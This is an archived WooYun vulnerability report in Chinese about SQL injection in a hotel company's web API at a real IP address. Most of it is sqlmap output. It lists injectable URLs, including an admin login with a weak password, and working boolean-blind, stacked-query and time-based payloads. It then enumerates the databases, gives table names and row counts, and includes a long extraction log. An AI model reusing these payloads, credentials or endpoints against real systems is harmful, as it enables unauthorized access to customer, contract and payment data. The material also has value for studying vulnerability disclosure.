乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-07: 细节已通知厂商并且等待厂商处理中 2015-07-12: 厂商已经主动忽略漏洞,细节向公众公开
1,http://220.196.57.147:8080/GetUser.aspx?password=123456&service=api_company_login&username=admin 2,http://220.196.57.147:8080/GetUnit.aspx?BeginDate=2015-06-20&City=3100&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist这里面几乎每个参数都存在注入3,http://220.196.57.147:8080/GetResv.aspx?endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-014,http://220.196.57.147:8080/GetUnit.aspx?RmtpId=1&service=api_getUnitRmtp&UnitId=0001
sqlmap identified the following injection points with a total of 84 HTTP(s) requests:---Parameter: startDate (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-01' AND 7092=7092 AND 'xqfP'='xqfP---sqlmap identified the following injection points with a total of 109 HTTP(s) requests:---Parameter: username (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: password=123456&service=api_company_login&username=-3213' OR 4831=4831 AND 'nAZu'='nAZu Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: password=123456&service=api_company_login&username=admin';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: password=123456&service=api_company_login&username=admin' AND 4493=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'jrjq'='jrjq---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 1349 HTTP(s) requests:---Parameter: City (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: BeginDate=2015-06-20&City=3100' AND 2004=2004 AND 'CMOs'='CMOs&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: BeginDate=2015-06-20&City=3100';WAITFOR DELAY '0:0:5'--&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [8]:[*] CenterDB[*] CenterDB_History[*] distribution[*] ERM[*] master[*] model[*] msdb[*] tempdbDatabase: ERM[169 tables]+-------------------------------------------+| BaseComment || BaseContact || BaseContactDetails || BaseException || BaseFile || BaseFolder || BaseItemDetails || BaseItems || BaseKnowledge || BaseLog || BaseMessage || BaseModule || BaseNews || BaseOrganize || BaseParameter || BasePermission || BasePermissionItem || BasePermissionScope || BaseProject || BaseRole || BaseRoleDeleted || BaseSequence || BaseStaff || BaseStaffOrganize || BaseTableColumns || BaseUser || BaseUserAddress || BaseUserMenDian || BaseUserOrganize || BaseUserRole || BusinessCard || CRM_BusinessLog || CRM_BusinessLogDetials || CRM_CDSTongBuRiZhi || CRM_JianYeShuDuiHuan || CRM_JianYeShuTongJi || CRM_JianYeShuTongJiLiuShui || CRM_JianYeShuTongJiRiZhi || CRM_PMSIssuedLog || CRM_PMSXiaFaRiZhi || CRM_QiYeFenZu || CRM_QiYeKeHuHuiFang || CRM_QiYeKeHuXieYi || CRM_QiYeKeHuXinXi || CRM_QiYeKeHuXinXiHB || CRM_QiYeLianXiRen || CRM_QiYeLianXiRen_20140624 || CRM_XieYiGuanLiZu || CRM_ZuMenDian || CRM_ZuYongHu || CRM_newJianYeShuTongJiLiuShui || DN_Unit || ItemsAllowDelete || ItemsAllowEdit || ItemsArea || ItemsAuditStatus || ItemsAuditWorkFlowCodeType || ItemsBugCategory || ItemsBugLevel || ItemsCondition || ItemsDegree || ItemsDeletionStateCode || ItemsDuiJingJiXingJiuDianYaoQiuDeShouXuan || ItemsDuty || ItemsEducation || ItemsEnabled || ItemsGender || ItemsGongSiDengJi || ItemsGongSiGuiMo || ItemsGongSiLeiXing || ItemsGongSiXingZhi || ItemsHangYe || ItemsHeZuoZhuangTai || ItemsJieSuanFangShi || ItemsLaiYuan || ItemsLeaveCategory || ItemsLianXiPinLyu || ItemsLinks || ItemsMuBiaoChuXingChengShi || ItemsMuQianZhuYaoHeZuoJiuDian || ItemsNationality || ItemsNewsCategory || ItemsOrganizeCategory || ItemsParty || ItemsPattern || ItemsPinPai || ItemsPriority || ItemsQuDaoDaiMa || ItemsQuanGuoXieYi || ItemsRenJunZhuSuBaoXiaoBiaoZhun || ItemsRoleCategory || ItemsSecurityLevel || ItemsShangWuQianLi || ItemsSuoYouXieYiZheKou || ItemsSystem || ItemsTablePermissionScope || ItemsTitle || ItemsTrueFalse || ItemsUnits || ItemsWed || ItemsWorkCategory || ItemsWorkFlowCategories || ItemsWorkStatus || ItemsWorkingProperty || ItemsXieYiLeiXing || ItemsXieYiZheKou || ItemsYesNo || ItemsYueJunZhuSuLiang || ItemsZhangHaoLeiXing || ItemsZhuCeZiJin || JiJiangItems || JinJiangModule || JinJiangPermission || JinJiangPermissionItem || JinJiangPermissionScope || JinJiangRole || JinJiangUserRole || OptionItemsComputerCategory || OptionItemsDisability || OptionItemsExpress || OptionItemsFaPiaoShuXing || OptionItemsFuKuanShuXing || OptionItemsHousehold || OptionItemsLockWaitMinute || OptionItemsOilAlarmFiltering || OptionItemsOilDataSource || OptionItemsOilEventGroup || OptionItemsOilEventType || OptionItemsOilEventType_Old || OptionItemsOilInstallations || OptionItemsOnSale || OptionItemsPayCategory || OptionItemsPostCategory || OptionItemsSalaryItemCategory || OptionItemsSendCategory || OptionItemsShouFeiLeiXing || Sheet1$ || V_CRM_JianYeShuDuiHuan || V_CRM_JianYeShuTongJiLiuShui || V_CRM_QiYeKeHuXieYi || V_CRM_QiYeKeHuXinXi || V_CRM_QiYeKeHuXinXiXuanZe || V_CRM_XiaoShouYuanGongXian || V_CRM_XiaoShouYuanGongXianDetail || WorkFlowItems || WorkFlowModule || WorkFlowPermission || WorkFlowPermissionItem || WorkFlowPermissionScope || WorkFlowRole || WorkFlowUserRole || WorkReport || ZB_Balanceinhandmode || ZB_BusinessAffairsPotential || ZB_CompanyType || ZB_ContactFrequecy || ZB_Contractstate || ZB_GongSiXingZhi || ZB_Market || ZB_RateCode || ZB_Vocation || ZE_Contract || ZE_National || Z_CRM_QiYeKeHuXieYi || Z_CRM_QiYeKeHuXinXi || Z_Contract || Z_GuestWebUser || Z_National || Z_UnitRole |+-------------------------------------------+Database: ERM+-----------------------------------------------+---------+| Table | Entries |+-----------------------------------------------+---------+| dbo.CRM_JianYeShuTongJiLiuShui | 842324 || dbo.V_CRM_JianYeShuTongJiLiuShui | 842324 || dbo.V_CRM_XiaoShouYuanGongXianDetail | 842324 || dbo.BaseLog | 148882 || dbo.CRM_JianYeShuTongJi | 141136 || dbo.CRM_BusinessLog | 94733 || dbo.CRM_BusinessLogDetials | 88870 || dbo.Z_National | 41480 || dbo.Z_Contract | 41321 || dbo.Z_CRM_QiYeKeHuXieYi | 41173 || dbo.Z_CRM_QiYeKeHuXinXi | 40983 || dbo.BaseParameter | 36444 || dbo.CRM_PMSIssuedLog | 11292 |[18:21:19] [INFO] fetching tables for database: CenterDB[18:21:19] [INFO] fetching number of tables for database 'CenterDB'[18:21:20] [INFO] resumed: 522[18:21:20] [INFO] resumed: dbo.AlBBConsumeInfo[18:21:20] [INFO] resumed: dbo.ALPayMentLog[18:21:20] [INFO] retrieved: dbo.ALPayMentLo[18:31:00] [INFO] retrieved: dbo.cccc2[18:39:33] [INFO] retrieved: dbo.CDS_AllSyncLog[18:53:52] [INFO] retrieved: dbo.CDS_AntithesesCompanyCode[19:10:39] [INFO] retrieved: dbo.CDS_AntithesesCompanyCode_Back[19:18:58] [INFO] retrieved: dbo.CDS_Channel[19:25:50] [INFO] retrieved: dbo.CDS_ChannelContribute[19:36:50] [INFO] retrieved: dbo.CDS_ChannelRateCode[19:46:25] [INFO] retrieved: dbo.CDS_CommunicationLog[20:01:53] [INFO] retrieved: dbo.CDS_CommunicationReport[20:10:43] [INFO] retrieved: dbo.CDS_Contract[20:18:30] [INFO] retrieved: dbo.CDS_CRSRmTp[20:26:12] [INFO] retrieved: dbo.CDS_Dictionary[20:36:53] [INFO] retrieved: dbo.CDS_ECInfo[20:45:07] [INFO] retrieved: dbo.CDS_GuaranteeRules[21:01:01] [INFO] retrieved: dbo.CDS_GuestWebUser_Test[21:16:27] [INFO] retrieved: dbo.CDS_InnHotel[21:26:16] [INFO] retrieved: dbo.CDS_JG[21:29:37] [INFO] retrieved: dbo.CDS_LOG[21:34:13] [INFO] retrieved: dbo.CDS_Market[21:42:00] [INFO] retrieved: dbo.CDS_MarketGroup[21:48:56] [INFO] retrieved: dbo.CDS_MarketingDictionary[22:03:46] [INFO] retrieved: dbo.CDS_National[22:12:57] [INFO] retrieved: dbo.CDS_National_back[22:19:51] [INFO] retrieved: dbo.CDS_National_Temp[22:27:47] [INFO] retrieved: dbo.CDS_NationalAcount[22:36:18] [INFO] retrieved: dbo.CDS_NationalBDAccount[22:47:27] [INFO] retrieved: dbo.CDS_NationalContract[22:58:12] [INFO] retrieved: dbo.CDS_NationalContract_000090037[23:10:59] [INFO] retrieved: dbo.CDS_NationalContract_20140717[23:22:13] [INFO] retrieved: dbo.CDS_NationalContract_back[23:29:42] [INFO] retrieved: dbo.CDS_Package[23:38:47] [INFO] retrieved: dbo.CDS_RateCode[23:46:49] [INFO] retrieved: dbo.CDS_RateCodeDetail[23:54:49] [INFO] retrieved: dbo.CDS_RateCodeDetail_Bak[00:01:59] [INFO] retrieved: dbo.CDS_RateCodeFormula[00:11:05] [INFO] retrieved: dbo.CDS_RateCodeGroup[00:20:38] [INFO] retrieved: dbo.CDS_RateCodeSwitch[00:29:32] [INFO] retrieved: dbo.CDS_RateI[00:38:46] [INFO] retrieved: dbo.CDS_Source[00:45:03] [INFO] retrieved: dbo.CDS_SourceGroup[00:51:31] [INFO] retrieved: dbo.CDS_Specials[00:58:37] [INFO] retrieved: dbo.CDS_SyncCardLog[01:08:42] [INFO] retrieved: dbo.CDS_Unit[01:13:45] [INFO] retrieved: dbo.CDS_UnitChannel[01:21:14] [INFO] retrieved: dbo.CDS_UnitRateCode[01:29:52] [INFO] retrieved: dbo.CDS_UnitRmTp[01:34:27] [INFO] retrieved: dbo.CDS_UnitRmTpLog[01:39:36] [INFO] retrieved: dbo.CDS_UnitSpecials[01:48:01] [INFO] retrieved: dbo.CDS_UserWeb[01:54:55] [INFO] retrieved: dbo.CDS_Visit[02:00:45] [INFO] retrieved: dbo.CDS_WebControlAttribute[02:18:05] [INFO] retrieved: dbo.CDS_WebModuleAttribute[02:32:14] [INFO] retrieved: dbo.CDS_WebPageAttribute[02:44:47] [INFO] retrieved: dbo.CDS_WebRole[02:50:11] [INFO] retrieved: dbo.CDS_WebSetting[02:58:02] [INFO] retrieved: dbo.CRM_InvoiceForCCard[03:14:34] [INFO] retrieved: dbo.CRM_MessageLog[03:24:40] [INFO] retrieved: dbo.CRM_MessageRecord[03:32:25] [INFO] retrieved: dbo.CRM_MessageTemplate[03:41:38] [INFO] retrieved: dbo.CRM_MessageType[03:46:53] [INFO] retrieved: dbo.CRS_Alipay_Asynchronous[04:06:37] [INFO] retrieved: dbo.CRS_Alipay_Asynchronous[04:30:53] [INFO] retrieved: dbo.CRS_Alipay_ShortNoteSendLog[04:48:58] [INFO] retrieved: dbo.CRS_Announcement[05:00:18] [INFO] retrieved: dbo.CRS_ChannelLog[05:11:43] [INFO] retrieved: dbo.CRS_FuncMapRole[05:23:33] [INFO] retrieved: dbo.CRS_FunctionInfo[05:33:00] [INFO] retrieved: dbo.CRS_HotelAnnouncementRelation[05:56:52] [INFO] retrieved: dbo.CRS_IssuedLOG[06:06:55] [INFO] retrieved: dbo.CRS_LOG[06:11:44] [INFO] retrieved: dbo.CRS_MenuInfo[06:21:26] [INFO] retrieved: dbo.CRS_RefundFastpay[06:36:27] [INFO] retrieved: dbo.CRS_ResvExportHeadText[06:53:44] [INFO] retrieved: dbo.CRS_RoleInfo[07:02:52] [INFO] retrieved: dbo.CRS_RoleType[07:09:13] [INFO] retrieved: dbo.CRS_UnitMapRole[07:21:54] [INFO] retrieved: dbo.CRS_UserInfo[07:31:10] [INFO] retrieved: dbo.CRS_UserMapRole[07:41:29] [INFO] retrieved: dbo.DBA_IndexFrag[07:57:52] [INFO] retrieved: dbo.destTbl[08:08:09] [INFO] retrieved: dbo.DN_AppCode[08:20:13] [INFO] retrieved: dbo.DN_AppLoad[08:27:23] [INFO] retrieved: dbo.DN_AppMenu[08:34:32] [INFO] retrieved: dbo.DN_AppModule[08:42:55] [INFO] retrieved: dbo.DN_AppParameter[08:55:56] [INFO] retrieved: dbo.DN_AppSystem[09:06:18] [INFO] retrieved: dbo.DN_CardCategory[09:26:01] [INFO] retrieved: dbo.DN_ChartUser[09:41:14] [INFO] retrieved: dbo.DN_Class[09:50:03] [INFO] retrieved: dbo.DN_CoCode
。。。。
危害等级:无影响厂商忽略
忽略时间:2015-07-12 12:12
漏洞Rank:15 (WooYun评价)
暂无